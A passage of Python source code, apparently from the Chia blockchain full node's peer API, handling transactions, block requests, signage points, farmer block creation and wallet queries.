Receives a full transaction from peer.
If tx is added to mempool, send tx_id to others. (new_transaction)
"""
assert tx_bytes != b""
spend_name = std_hash(tx_bytes)
if spend_name in self.full_node.full_node_store.pending_tx_request:
self.full_node.full_node_store.pending_tx_request.pop(spend_name)
if spend_name in self.full_node.full_node_store.peers_with_tx:
self.full_node.full_node_store.peers_with_tx.pop(spend_name)
if self.full_node.transaction_queue.qsize() % 100 == 0 and not self.full_node.transaction_queue.empty():
self.full_node.log.debug(f"respond_transaction Waiters: {self.full_node.transaction_queue.qsize()}")
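        # If the validation queue is full, drop this transaction and record the drop.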
if self.full_node.transaction_queue.full():
self.full_node.dropped_tx.add(spend_name)
return None
# Higher fee means priority is a smaller number, which means it will be handled earlier
await self.full_node.transaction_queue.put(
(0, TransactionQueueEntry(tx.transaction, tx_bytes, spend_name, peer, test))
)
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_proof_of_weight])
async def request_proof_of_weight(self, request: full_node_protocol.RequestProofOfWeight) -> Optional[Message]:
if self.full_node.weight_proof_handler is None:
return None
if not self.full_node.blockchain.contains_block(request.tip):
self.log.error(f"got weight proof request for unknown peak {request.tip}")
return None
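        # Deduplicate concurrent proof-of-weight creation: if another task is already
        # building a proof for this tip, wait on its event instead of recomputing.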
if request.tip in self.full_node.pow_creation:
event = self.full_node.pow_creation[request.tip]
await event.wait()
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
else:
event = asyncio.Event()
self.full_node.pow_creation[request.tip] = event
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
event.set()
tips = list(self.full_node.pow_creation.keys())
if len(tips) > 4:
# Remove old from cache
for i in range(0, 4):
self.full_node.pow_creation.pop(tips[i])
if wp is None:
self.log.error(f"failed creating weight proof for peak {request.tip}")
return None
# Serialization of wp is slow
if (
self.full_node.full_node_store.serialized_wp_message_tip is not None
and self.full_node.full_node_store.serialized_wp_message_tip == request.tip
):
return self.full_node.full_node_store.serialized_wp_message
message = make_msg(
ProtocolMessageTypes.respond_proof_of_weight, full_node_protocol.RespondProofOfWeight(wp, request.tip)
)
self.full_node.full_node_store.serialized_wp_message_tip = request.tip
self.full_node.full_node_store.serialized_wp_message = message
return message
@api_request
async def respond_proof_of_weight(self, request: full_node_protocol.RespondProofOfWeight) -> Optional[Message]:
self.log.warning("Received proof of weight too late.")
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_block, ProtocolMessageTypes.reject_block])
async def request_block(self, request: full_node_protocol.RequestBlock) -> Optional[Message]:
if not self.full_node.blockchain.contains_height(request.height):
reject = RejectBlock(request.height)
msg = make_msg(ProtocolMessageTypes.reject_block, reject)
return msg
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(request.height)
if header_hash is None:
return make_msg(ProtocolMessageTypes.reject_block, RejectBlock(request.height))
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
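            # Strip the transactions generator when the requester did not ask for
            # transaction-level block contents.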
if not request.include_transaction_block and block.transactions_generator is not None:
block = dataclasses.replace(block, transactions_generator=None)
return make_msg(ProtocolMessageTypes.respond_block, full_node_protocol.RespondBlock(block))
return make_msg(ProtocolMessageTypes.reject_block, RejectBlock(request.height))
@api_request
@reply_type([ProtocolMessageTypes.respond_blocks, ProtocolMessageTypes.reject_blocks])
async def request_blocks(self, request: full_node_protocol.RequestBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
reject = RejectBlocks(request.start_height, request.end_height)
msg: Message = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
for i in range(request.start_height, request.end_height + 1):
if not self.full_node.blockchain.contains_height(uint32(i)):
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
if not request.include_transaction_block:
blocks: List[FullBlock] = []
for i in range(request.start_height, request.end_height + 1):
header_hash_i: Optional[bytes32] = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash_i is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash_i)
if block is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block = dataclasses.replace(block, transactions_generator=None)
blocks.append(block)
msg = make_msg(
ProtocolMessageTypes.respond_blocks,
full_node_protocol.RespondBlocks(request.start_height, request.end_height, blocks),
)
else:
blocks_bytes: List[bytes] = []
for i in range(request.start_height, request.end_height + 1):
header_hash_i = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash_i is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block_bytes: Optional[bytes] = await self.full_node.block_store.get_full_block_bytes(header_hash_i)
if block_bytes is None:
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
blocks_bytes.append(block_bytes)
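            # Build the RespondBlocks payload by hand from the raw block bytes already in
            # the store: uint32 start height, uint32 end height, a 4-byte big-endian list
            # length, then each serialized block. This avoids deserializing and
            # re-serializing every full block.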
respond_blocks_manually_streamed: bytes = (
bytes(uint32(request.start_height))
+ bytes(uint32(request.end_height))
+ len(blocks_bytes).to_bytes(4, "big", signed=False)
)
for block_bytes in blocks_bytes:
respond_blocks_manually_streamed += block_bytes
msg = make_msg(ProtocolMessageTypes.respond_blocks, respond_blocks_manually_streamed)
return msg
@api_request
async def reject_block(self, request: full_node_protocol.RejectBlock):
self.log.debug(f"reject_block {request.height}")
@api_request
async def reject_blocks(self, request: full_node_protocol.RejectBlocks):
self.log.debug(f"reject_blocks {request.start_height} {request.end_height}")
@api_request
async def respond_blocks(self, request: full_node_protocol.RespondBlocks) -> None:
self.log.warning("Received unsolicited/late blocks")
return None
@api_request
@peer_required
async def respond_block(
self,
respond_block: full_node_protocol.RespondBlock,
peer: ws.WSChiaConnection,
) -> Optional[Message]:
"""
Receive a full block from a peer full node (or ourselves).
"""
self.log.warning(f"Received unsolicited/late block from peer {peer.get_peer_logging()}")
return None
@api_request
async def new_unfinished_block(
self, new_unfinished_block: full_node_protocol.NewUnfinishedBlock
) -> Optional[Message]:
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
block_hash = new_unfinished_block.unfinished_reward_hash
if self.full_node.full_node_store.get_unfinished_block(block_hash) is not None:
return None
# This prevents us from downloading the same block from many peers
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
return None
msg = make_msg(
ProtocolMessageTypes.request_unfinished_block,
full_node_protocol.RequestUnfinishedBlock(block_hash),
)
self.full_node.full_node_store.requesting_unfinished_blocks.add(block_hash)
# However, we want to eventually download from other peers, if this peer does not respond
# Todo: keep track of who it was
async def eventually_clear():
await asyncio.sleep(5)
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
self.full_node.full_node_store.requesting_unfinished_blocks.remove(block_hash)
asyncio.create_task(eventually_clear())
return msg
@api_request
@reply_type([ProtocolMessageTypes.respond_unfinished_block])
async def request_unfinished_block(
self, request_unfinished_block: full_node_protocol.RequestUnfinishedBlock
) -> Optional[Message]:
unfinished_block: Optional[UnfinishedBlock] = self.full_node.full_node_store.get_unfinished_block(
request_unfinished_block.unfinished_reward_hash
)
if unfinished_block is not None:
msg = make_msg(
ProtocolMessageTypes.respond_unfinished_block,
full_node_protocol.RespondUnfinishedBlock(unfinished_block),
)
return msg
return None
@peer_required
@api_request
@bytes_required
async def respond_unfinished_block(
self,
respond_unfinished_block: full_node_protocol.RespondUnfinishedBlock,
peer: ws.WSChiaConnection,
respond_unfinished_block_bytes: bytes = b"",
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_unfinished_block(
respond_unfinished_block, peer, block_bytes=respond_unfinished_block_bytes
)
return None
@api_request
@peer_required
async def new_signage_point_or_end_of_sub_slot(
self, new_sp: full_node_protocol.NewSignagePointOrEndOfSubSlot, peer: ws.WSChiaConnection
) -> Optional[Message]:
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_signage_point_by_index(
new_sp.challenge_hash,
new_sp.index_from_challenge,
new_sp.last_rc_infusion,
)
is not None
):
return None
if self.full_node.full_node_store.have_newer_signage_point(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
):
return None
if new_sp.index_from_challenge == 0 and new_sp.prev_challenge_hash is not None:
if self.full_node.full_node_store.get_sub_slot(new_sp.prev_challenge_hash) is None:
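                # We are missing the previous sub slot: walk backwards, requesting
                # end-of-sub-slot bundles from the peer until reaching one we already have
                # (or the genesis challenge), then replay the collected bundles in order.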
collected_eos = []
challenge_hash_to_request = new_sp.challenge_hash
last_rc = new_sp.last_rc_infusion
num_non_empty_sub_slots_seen = 0
for _ in range(30):
if num_non_empty_sub_slots_seen >= 3:
self.log.debug("Diverged from peer. Don't have the same blocks")
return None
# If this is an end of sub slot, and we don't have the prev, request the prev instead
# We want to catch up to the latest slot so we can receive signage points
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
challenge_hash_to_request, uint8(0), last_rc
)
response = await peer.request_signage_point_or_end_of_sub_slot(full_node_request, timeout=10)
if not isinstance(response, full_node_protocol.RespondEndOfSubSlot):
self.full_node.log.debug(f"Invalid response for slot {response}")
return None
collected_eos.append(response)
if (
self.full_node.full_node_store.get_sub_slot(
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
is not None
or response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
== self.full_node.constants.GENESIS_CHALLENGE
):
for eos in reversed(collected_eos):
await self.respond_end_of_sub_slot(eos, peer)
return None
if (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.number_of_iterations
!= response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.number_of_iterations
):
num_non_empty_sub_slots_seen += 1
challenge_hash_to_request = (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
last_rc = response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.challenge
self.full_node.log.warning("Failed to catch up in sub-slots")
return None
if new_sp.index_from_challenge > 0:
if (
new_sp.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE
and self.full_node.full_node_store.get_sub_slot(new_sp.challenge_hash) is None
):
                # If this is a normal signage point and we don't have the end of sub slot, request the end of sub slot
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, uint8(0), new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
# Otherwise (we have the prev or the end of sub slot), request it normally
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
@api_request
@reply_type([ProtocolMessageTypes.respond_signage_point, ProtocolMessageTypes.respond_end_of_sub_slot])
async def request_signage_point_or_end_of_sub_slot(
self, request: full_node_protocol.RequestSignagePointOrEndOfSubSlot
) -> Optional[Message]:
if request.index_from_challenge == 0:
sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = self.full_node.full_node_store.get_sub_slot(
request.challenge_hash
)
if sub_slot is not None:
return make_msg(
ProtocolMessageTypes.respond_end_of_sub_slot,
full_node_protocol.RespondEndOfSubSlot(sub_slot[0]),
)
else:
if self.full_node.full_node_store.get_sub_slot(request.challenge_hash) is None:
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
self.log.info(f"Don't have challenge hash {request.challenge_hash}")
sp: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point_by_index(
request.challenge_hash,
request.index_from_challenge,
request.last_rc_infusion,
)
if sp is not None:
assert (
sp.cc_vdf is not None
and sp.cc_proof is not None
and sp.rc_vdf is not None
and sp.rc_proof is not None
)
full_node_response = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
sp.cc_vdf,
sp.cc_proof,
sp.rc_vdf,
sp.rc_proof,
)
return make_msg(ProtocolMessageTypes.respond_signage_point, full_node_response)
else:
self.log.info(f"Don't have signage point {request}")
return None
@peer_required
@api_request
async def respond_signage_point(
self, request: full_node_protocol.RespondSignagePoint, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
# Already have signage point
if self.full_node.full_node_store.have_newer_signage_point(
request.challenge_chain_vdf.challenge,
request.index_from_challenge,
request.reward_chain_vdf.challenge,
):
return None
existing_sp = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_vdf.output.get_hash()
)
if existing_sp is not None and existing_sp.rc_vdf == request.reward_chain_vdf:
return None
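            # Determine the next sub-slot iterations and the peak's infusion-point sub
            # slot; early in the chain (within MAX_SUB_SLOT_BLOCKS of genesis) fall back
            # to the starting constants.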
peak = self.full_node.blockchain.get_peak()
if peak is not None and peak.height > self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
next_sub_slot_iters = self.full_node.blockchain.get_next_slot_iters(peak.header_hash, True)
sub_slots_for_peak = await self.full_node.blockchain.get_sp_and_ip_sub_slots(peak.header_hash)
assert sub_slots_for_peak is not None
ip_sub_slot: Optional[EndOfSubSlotBundle] = sub_slots_for_peak[1]
else:
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
next_sub_slot_iters = sub_slot_iters
ip_sub_slot = None
added = self.full_node.full_node_store.new_signage_point(
request.index_from_challenge,
self.full_node.blockchain,
self.full_node.blockchain.get_peak(),
next_sub_slot_iters,
SignagePoint(
request.challenge_chain_vdf,
request.challenge_chain_proof,
request.reward_chain_vdf,
request.reward_chain_proof,
),
)
if added:
await self.full_node.signage_point_post_processing(request, peer, ip_sub_slot)
else:
self.log.debug(
f"Signage point {request.index_from_challenge} not added, CC challenge: "
f"{request.challenge_chain_vdf.challenge}, RC challenge: {request.reward_chain_vdf.challenge}"
)
return None
@peer_required
@api_request
async def respond_end_of_sub_slot(
self, request: full_node_protocol.RespondEndOfSubSlot, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
msg, _ = await self.full_node.respond_end_of_sub_slot(request, peer)
return msg
@peer_required
@api_request
async def request_mempool_transactions(
self,
request: full_node_protocol.RequestMempoolTransactions,
peer: ws.WSChiaConnection,
) -> Optional[Message]:
received_filter = PyBIP158(bytearray(request.filter))
items: List[MempoolItem] = await self.full_node.mempool_manager.get_items_not_in_filter(received_filter)
for item in items:
transaction = full_node_protocol.RespondTransaction(item.spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
await peer.send_message(msg)
return None
# FARMER PROTOCOL
@api_request
@peer_required
async def declare_proof_of_space(
self, request: farmer_protocol.DeclareProofOfSpace, peer: ws.WSChiaConnection
) -> Optional[Message]:
"""
Creates a block body and header, with the proof of space, coinbase, and fee targets provided
by the farmer, and sends the hash of the header data back to the farmer.
"""
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
sp_vdfs: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_sp
)
if sp_vdfs is None:
self.log.warning(f"Received proof of space for an unknown signage point {request.challenge_chain_sp}")
return None
if request.signage_point_index > 0:
assert sp_vdfs.rc_vdf is not None
if sp_vdfs.rc_vdf.output.get_hash() != request.reward_chain_sp:
self.log.debug(
f"Received proof of space for a potentially old signage point {request.challenge_chain_sp}. "
f"Current sp: {sp_vdfs.rc_vdf.output.get_hash()}"
)
return None
if request.signage_point_index == 0:
cc_challenge_hash: bytes32 = request.challenge_chain_sp
else:
assert sp_vdfs.cc_vdf is not None
cc_challenge_hash = sp_vdfs.cc_vdf.challenge
pos_sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = None
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
# Checks that the proof of space is a response to a recent challenge and valid SP
pos_sub_slot = self.full_node.full_node_store.get_sub_slot(cc_challenge_hash)
if pos_sub_slot is None:
self.log.warning(f"Received proof of space for an unknown sub slot: {request}")
return None
total_iters_pos_slot: uint128 = pos_sub_slot[2]
else:
total_iters_pos_slot = uint128(0)
assert cc_challenge_hash == request.challenge_hash
# Now we know that the proof of space has a signage point either:
# 1. In the previous sub-slot of the peak (overflow)
# 2. In the same sub-slot as the peak
# 3. In a future sub-slot that we already know of
# Checks that the proof of space is valid
quality_string: Optional[bytes32] = request.proof_of_space.verify_and_get_quality_string(
self.full_node.constants, cc_challenge_hash, request.challenge_chain_sp
)
assert quality_string is not None and len(quality_string) == 32
# Grab best transactions from Mempool for given tip target
aggregate_signature: G2Element = G2Element()
block_generator: Optional[BlockGenerator] = None
additions: Optional[List[Coin]] = []
removals: Optional[List[Coin]] = []
async with self.full_node._blockchain_lock_high_priority:
peak: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
if peak is not None:
# Finds the last transaction block before this one
curr_l_tb: BlockRecord = peak
while not curr_l_tb.is_transaction_block:
curr_l_tb = self.full_node.blockchain.block_record(curr_l_tb.prev_hash)
try:
mempool_bundle = await self.full_node.mempool_manager.create_bundle_from_mempool(
curr_l_tb.header_hash
)
except Exception as e:
self.log.error(f"Traceback: {traceback.format_exc()}")
self.full_node.log.error(f"Error making spend bundle {e} peak: {peak}")
mempool_bundle = None
if mempool_bundle is not None:
spend_bundle = mempool_bundle[0]
additions = mempool_bundle[1]
removals = mempool_bundle[2]
self.full_node.log.info(f"Add rem: {len(additions)} {len(removals)}")
aggregate_signature = spend_bundle.aggregated_signature
if self.full_node.full_node_store.previous_generator is not None:
self.log.info(
f"Using previous generator for height "
f"{self.full_node.full_node_store.previous_generator}"
)
block_generator = best_solution_generator_from_template(
self.full_node.full_node_store.previous_generator, spend_bundle
)
else:
block_generator = simple_solution_generator(spend_bundle)
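            # Signature callbacks for create_unfinished_block: the farmer already signed
            # both signage points, so return the matching signature when asked to sign one
            # of them; the pool signature is the one provided in the request.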
def get_plot_sig(to_sign, _) -> G2Element:
if to_sign == request.challenge_chain_sp:
return request.challenge_chain_sp_signature
elif to_sign == request.reward_chain_sp:
return request.reward_chain_sp_signature
return G2Element()
def get_pool_sig(_1, _2) -> Optional[G2Element]:
return request.pool_signature
prev_b: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
# Finds the previous block from the signage point, ensuring that the reward chain VDF is correct
if prev_b is not None:
if request.signage_point_index == 0:
if pos_sub_slot is None:
self.log.warning("Pos sub slot is None")
return None
rc_challenge = pos_sub_slot[0].reward_chain.end_of_slot_vdf.challenge
else:
assert sp_vdfs.rc_vdf is not None
rc_challenge = sp_vdfs.rc_vdf.challenge
# Backtrack through empty sub-slots
for eos, _, _ in reversed(self.full_node.full_node_store.finished_sub_slots):
if eos is not None and eos.reward_chain.get_hash() == rc_challenge:
rc_challenge = eos.reward_chain.end_of_slot_vdf.challenge
found = False
attempts = 0
while prev_b is not None and attempts < 10:
if prev_b.reward_infusion_new_challenge == rc_challenge:
found = True
break
if prev_b.finished_reward_slot_hashes is not None and len(prev_b.finished_reward_slot_hashes) > 0:
if prev_b.finished_reward_slot_hashes[-1] == rc_challenge:
# This block includes a sub-slot which is where our SP vdf starts. Go back one more
# to find the prev block
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
found = True
break
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
attempts += 1
if not found:
self.log.warning("Did not find a previous block with the correct reward chain hash")
return None
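            # Gather the end-of-sub-slot bundles between the previous block and this
            # challenge; if they disagree with the sub slot the proof of space came from,
            # this block cannot be farmed.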
try:
finished_sub_slots: Optional[
List[EndOfSubSlotBundle]
] = self.full_node.full_node_store.get_finished_sub_slots(
self.full_node.blockchain, prev_b, cc_challenge_hash
)
if finished_sub_slots is None:
return None
if (
len(finished_sub_slots) > 0
and pos_sub_slot is not None
and finished_sub_slots[-1] != pos_sub_slot[0]
):
self.log.error("Have different sub-slots than is required to farm this block")
return None
except ValueError as e:
self.log.warning(f"Value Error: {e}")
return None
if prev_b is None:
pool_target = PoolTarget(
self.full_node.constants.GENESIS_PRE_FARM_POOL_PUZZLE_HASH,
uint32(0),
)
farmer_ph = self.full_node.constants.GENESIS_PRE_FARM_FARMER_PUZZLE_HASH
else:
farmer_ph = request.farmer_puzzle_hash
if request.proof_of_space.pool_contract_puzzle_hash is not None:
pool_target = PoolTarget(request.proof_of_space.pool_contract_puzzle_hash, uint32(0))
else:
assert request.pool_target is not None
pool_target = request.pool_target
if peak is None or peak.height <= self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
difficulty = self.full_node.constants.DIFFICULTY_STARTING
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
else:
difficulty = uint64(peak.weight - self.full_node.blockchain.block_record(peak.prev_hash).weight)
sub_slot_iters = peak.sub_slot_iters
for sub_slot in finished_sub_slots:
if sub_slot.challenge_chain.new_difficulty is not None:
difficulty = sub_slot.challenge_chain.new_difficulty
if sub_slot.challenge_chain.new_sub_slot_iters is not None:
sub_slot_iters = sub_slot.challenge_chain.new_sub_slot_iters
required_iters: uint64 = calculate_iterations_quality(
self.full_node.constants.DIFFICULTY_CONSTANT_FACTOR,
quality_string,
request.proof_of_space.size,
difficulty,
request.challenge_chain_sp,
)
sp_iters: uint64 = calculate_sp_iters(self.full_node.constants, sub_slot_iters, request.signage_point_index)
ip_iters: uint64 = calculate_ip_iters(
self.full_node.constants,
sub_slot_iters,
request.signage_point_index,
required_iters,
)
# The block's timestamp must be greater than the previous transaction block's timestamp
timestamp = uint64(int(time.time()))
curr: Optional[BlockRecord] = prev_b
while curr is not None and not curr.is_transaction_block and curr.height != 0:
curr = self.full_node.blockchain.try_block_record(curr.prev_hash)
if curr is not None:
assert curr.timestamp is not None
if timestamp <= curr.timestamp:
timestamp = uint64(int(curr.timestamp + 1))
self.log.info("Starting to make the unfinished block")
unfinished_block: UnfinishedBlock = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
block_generator,
aggregate_signature,
additions,
removals,
prev_b,
finished_sub_slots,
)
self.log.info("Made the unfinished block")
if prev_b is not None:
height: uint32 = uint32(prev_b.height + 1)
else:
height = uint32(0)
self.full_node.full_node_store.add_candidate_block(quality_string, height, unfinished_block)
foliage_sb_data_hash = unfinished_block.foliage.foliage_block_data.get_hash()
if unfinished_block.is_transaction_block():
foliage_transaction_block_hash = unfinished_block.foliage.foliage_transaction_block_hash
else:
foliage_transaction_block_hash = bytes32([0] * 32)
assert foliage_transaction_block_hash is not None
message = farmer_protocol.RequestSignedValues(
quality_string,
foliage_sb_data_hash,
foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
# Adds backup in case the first one fails
if unfinished_block.is_transaction_block() and unfinished_block.transactions_generator is not None:
unfinished_block_backup = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
None,
G2Element(),
None,
None,
prev_b,
finished_sub_slots,
)
self.full_node.full_node_store.add_candidate_block(
quality_string, height, unfinished_block_backup, backup=True
)
return None
@api_request
@peer_required
async def signed_values(
self, farmer_request: farmer_protocol.SignedValues, peer: ws.WSChiaConnection
) -> Optional[Message]:
"""
Signature of header hash, by the harvester. This is enough to create an unfinished
block, which only needs a Proof of Time to be finished. If the signature is valid,
we call the unfinished_block routine.
"""
candidate_tuple: Optional[Tuple[uint32, UnfinishedBlock]] = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string
)
if candidate_tuple is None:
self.log.warning(f"Quality string {farmer_request.quality_string} not found in database")
return None
height, candidate = candidate_tuple
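# Verify the farmer's BLS signature over the foliage block data against the plot public key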
if not AugSchemeMPL.verify(
candidate.reward_chain_block.proof_of_space.plot_public_key,
candidate.foliage.foliage_block_data.get_hash(),
farmer_request.foliage_block_data_signature,
):
self.log.warning("Signature not valid. There might be a collision in plots. Ignore this during tests.")
return None
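# Attach the received signatures to the candidate block's foliage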
fsb2 = dataclasses.replace(
candidate.foliage,
foliage_block_data_signature=farmer_request.foliage_block_data_signature,
)
if candidate.is_transaction_block():
fsb2 = dataclasses.replace(
fsb2, foliage_transaction_block_signature=farmer_request.foliage_transaction_block_signature
)
new_candidate = dataclasses.replace(candidate, foliage=fsb2)
if not self.full_node.has_valid_pool_sig(new_candidate):
self.log.warning("Trying to make a pre-farm block but height is not 0")
return None
# Propagate to ourselves (which validates and does further propagations)
request = full_node_protocol.RespondUnfinishedBlock(new_candidate)
try:
await self.full_node.respond_unfinished_block(request, None, True)
except Exception as e:
# If we have an error with this block, try making an empty block
self.full_node.log.error(f"Error farming block {e} {request}")
candidate_tuple = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string, backup=True
)
if candidate_tuple is not None:
height, unfinished_block = candidate_tuple
self.full_node.full_node_store.add_candidate_block(
farmer_request.quality_string, height, unfinished_block, False
)
# All unfinished blocks that we create will have the foliage transaction block and hash
assert unfinished_block.foliage.foliage_transaction_block_hash is not None
message = farmer_protocol.RequestSignedValues(
farmer_request.quality_string,
unfinished_block.foliage.foliage_block_data.get_hash(),
unfinished_block.foliage.foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
return None
# TIMELORD PROTOCOL
@peer_required
@api_request
async def new_infusion_point_vdf(
self, request: timelord_protocol.NewInfusionPointVDF, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
# Lookup unfinished blocks
async with self.full_node.timelord_lock:
return await self.full_node.new_infusion_point_vdf(request, peer)
@peer_required
@api_request
async def new_signage_point_vdf(
self, request: timelord_protocol.NewSignagePointVDF, peer: ws.WSChiaConnection
) -> None:
if self.full_node.sync_store.get_sync_mode():
return None
full_node_message = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
request.challenge_chain_sp_vdf,
request.challenge_chain_sp_proof,
request.reward_chain_sp_vdf,
request.reward_chain_sp_proof,
)
await self.respond_signage_point(full_node_message, peer)
@peer_required
@api_request
async def new_end_of_sub_slot_vdf(
self, request: timelord_protocol.NewEndOfSubSlotVDF, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_sub_slot(request.end_of_sub_slot_bundle.challenge_chain.get_hash())
is not None
):
return None
# Calls our own internal handler for the end of sub slot, which potentially broadcasts to other peers.
full_node_message = full_node_protocol.RespondEndOfSubSlot(request.end_of_sub_slot_bundle)
msg, added = await self.full_node.respond_end_of_sub_slot(full_node_message, peer)
if not added:
self.log.error(
f"Was not able to add end of sub-slot: "
f"{request.end_of_sub_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge}. "
f"Re-sending new-peak to timelord"
)
await self.full_node.send_peak_to_timelords(peer=peer)
return None
else:
return msg
@api_request
async def request_block_header(self, request: wallet_protocol.RequestBlockHeader) -> Optional[Message]:
header_hash = self.full_node.blockchain.height_to_hash(request.height)
if header_hash is None:
msg = make_msg(ProtocolMessageTypes.reject_header_request, RejectHeaderRequest(request.height))
return msg
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
tx_removals, tx_additions, _ = await self.full_node.blockchain.get_tx_removals_and_additions(block)
header_block = get_block_header(block, tx_additions, tx_removals)
msg = make_msg(
ProtocolMessageTypes.respond_block_header,
wallet_protocol.RespondBlockHeader(header_block),
)
return msg
return None
@api_request
async def request_additions(self, request: wallet_protocol.RequestAdditions) -> Optional[Message]:
if request.header_hash is None:
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(request.height)
else:
header_hash = request.header_hash
if header_hash is None:
raise ValueError(f"Block at height {request.height} not found")
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
# We lock so that the coin store does not get modified
if (
block is None
or block.is_transaction_block() is False
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectAdditionsRequest(request.height, header_hash)
msg = make_msg(ProtocolMessageTypes.reject_additions_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return stale data if a reorg happens in the meantime
additions = await self.full_node.coin_store.get_coins_added_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
puzzlehash_coins_map: Dict[bytes32, List[Coin]] = {}
for coin_record in additions:
if coin_record.coin.puzzle_hash in puzzlehash_coins_map:
puzzlehash_coins_map[coin_record.coin.puzzle_hash].append(coin_record.coin)
else:
puzzlehash_coins_map[coin_record.coin.puzzle_hash] = [coin_record.coin]
coins_map: List[Tuple[bytes32, List[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes, Optional[bytes]]] = []
if request.puzzle_hashes is None:
for puzzle_hash, coins in puzzlehash_coins_map.items():
coins_map.append((puzzle_hash, coins))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, None)
else:
# Create addition Merkle set
addition_merkle_set = MerkleSet()
# Addition Merkle set contains puzzlehash and hash of all coins with that puzzlehash
for puzzle, coins in puzzlehash_coins_map.items():
